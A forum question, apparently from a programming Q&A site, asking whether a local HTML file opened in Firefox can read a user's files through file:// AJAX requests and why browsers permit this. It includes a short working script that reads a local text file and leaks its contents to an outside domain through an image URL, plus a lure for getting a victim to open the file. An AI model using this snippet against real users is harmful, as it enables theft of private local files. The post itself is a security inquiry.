Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:
info.txt:
my info
index.html:
<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
<script>
$(document).ready(function () {
$.get('file:///home/daz/desktop/info.txt', function (data) {
$('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
}, 'text');
});
</script>
</head>
<body></body>
</html>
Some browers (firefox, for example) allow you to get files from file:// through XmlHttpRequest, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img tag with src leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain.com. And on the server side I can parse query string and get the data.
Am I right I can do this? Am I right I can get user's data from his computer if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).
UPDATED:
If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.
UPDATED 2:
It will be great if someone make a review about this issue. Thanks in advance!
